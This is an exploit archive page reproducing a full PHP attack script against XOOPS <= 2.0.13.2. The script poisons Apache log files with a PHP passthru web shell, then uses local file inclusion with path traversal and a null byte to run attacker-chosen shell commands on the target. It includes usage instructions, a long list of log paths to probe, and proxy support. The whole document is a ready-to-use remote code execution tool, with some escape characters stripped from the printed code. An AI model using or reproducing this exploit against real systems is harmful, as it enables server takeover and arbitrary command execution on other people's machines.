XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit

Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050128

Below is a copy:
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploitrn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]rn";

echo "site: http://retrogod.altervista.orgrnrn";

/*

works with:

magic_quotes_gpc = Off

register_globals = On

*/

if ($argc<4) {

echo "Usage: php ".$argv[0]." host path cmd OPTIONSrn";

echo "host:      target server (ip/hostname)rn";

echo "path:      path to xoopsrn";

echo "cmd:       a shell commandrn";

echo "Options:rn";

echo "   -p[port]:    specify a port other than 80rn";

echo "   -P[ip:port]: specify a proxyrn";

echo "Examples:rn";

echo "php ".$argv[0]." localhost /xoops/ rn";

echo "php ".$argv[0]." localhost /xoops/ ls -la -p81rn";

echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80rn";

die;

}

/* hi, back from my annual social engineering tour, this year in Milan ;)

welcome to this new 0day experience...

explaination:

vulnerable code in mainfile.php at lines 94-96:

...

if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') {

include XOOPS_ROOT_PATH."/include/common.php";

}

...

if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to

skip common.php inclusion where $xoopsConfig['language'] and

$xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off

you can include arbitrary files from local resources, ex., Apache log files:

http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoo
psConfig[language]=../../../../../../../../../../var/log/httpd/access_lo
g%00

http://[target]/[path]/index.php?cmd=ls%0-la&xoopsOption[nocommon]=1&xoo
psConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_lo
g%00

or, if avatar uploads are enabled:

http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=
1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00

this tool inject some php code in apache log files and try to launch commands

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.="  .";}

else

{$result.="  ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

$host=$argv[1];

$path=$argv[2];

$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "[1] Injecting some code in log files ...rnrn";

$CODE="*delim*<?php error_reporting(0);set_time_limit(0);passthru($_COOKIE[cmd]);die;?>";

$packet="GET ".$p.$CODE." HTTP/1.0rn";

$packet.="User-Agent: ".$CODE." Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Connection: closernrn";

sendpacketii($packet);

sleep(1);

//fill with possible locations...

$paths=array(

"../../../../../../../../../../var/log/httpd/access_log",

"../../../../../../../../../../var/log/httpd/error_log",

"../apache/logs/error.log",

"../apache/logs/access.log",

"../../apache/logs/error.log",

"../../apache/logs/access.log",

"../../../apache/logs/error.log",

"../../../apache/logs/access.log",

"../../../../apache/logs/error.log",

"../../../../apache/logs/access.log",

"../../../../../apache/logs/error.log",

"../../../../../apache/logs/access.log",

"../../../../../../apache/logs/error.log",

"../../../../../../apache/logs/access.log",

"../logs/error.log",

"../logs/access.log",

"../../logs/error.log",

"../../logs/access.log",

"../../../logs/error.log",

"../../../logs/access.log",

"../../../../logs/error.log",

"../../../../logs/access.log",

"../../../../../logs/error.log",

"../../../../../logs/access.log",

"../../../../../../logs/error.log",

"../../../../../../logs/access.log",

"../../../../../../../../../../etc/httpd/logs/acces_log",

"../../../../../../../../../../etc/httpd/logs/acces.log",

"../../../../../../../../../../etc/httpd/logs/error_log",

"../../../../../../../../../../etc/httpd/logs/error.log",

"../../../../../../../../../../var/www/logs/access_log",

"../../../../../../../../../../var/www/logs/access.log",

"../../../../../../../../../../usr/local/apache/logs/access_log",

"../../../../../../../../../../usr/local/apache/logs/access.log",

"../../../../../../../../../../var/log/apache/access_log",

"../../../../../../../../../../var/log/apache/access.log",

"../../../../../../../../../../var/log/access_log",

"../../../../../../../../../../var/www/logs/error_log",

"../../../../../../../../../../var/www/logs/error.log",

"../../../../../../../../../../usr/local/apache/logs/error_log",

"../../../../../../../../../../usr/local/apache/logs/error.log",

"../../../../../../../../../../var/log/apache/error_log",

"../../../../../../../../../../var/log/apache/error.log",

"../../../../../../../../../../var/log/access_log",

"../../../../../../../../../../var/log/error_log"

);

$xpl= array (

"misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=",

"index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]="

);

for ($j=0; $j<=count($xpl)-1; $j++)

{

for ($i=0; $i<=count($paths)-1; $i++)

{

$a=$i+2;

echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00rn";

$packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0rn";

$packet.="Host: ".$host."rn";

$packet.="Cookie: cmd=".$cmd.";rn";

$packet.="Connection: Closernrn";

#debug

#echo quick_dump($packet);

sendpacketii($packet);

if (strstr($html,"*delim*"))

{

echo "Exploit succeeded...rn";

$temp=explode("*delim*",$html);

die($temp[1]);

}

}

}

//if you are here...

echo "Exploit failed...";

?>

original url: http://retrogod.altervista.org/xoops_20132_incl.html
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.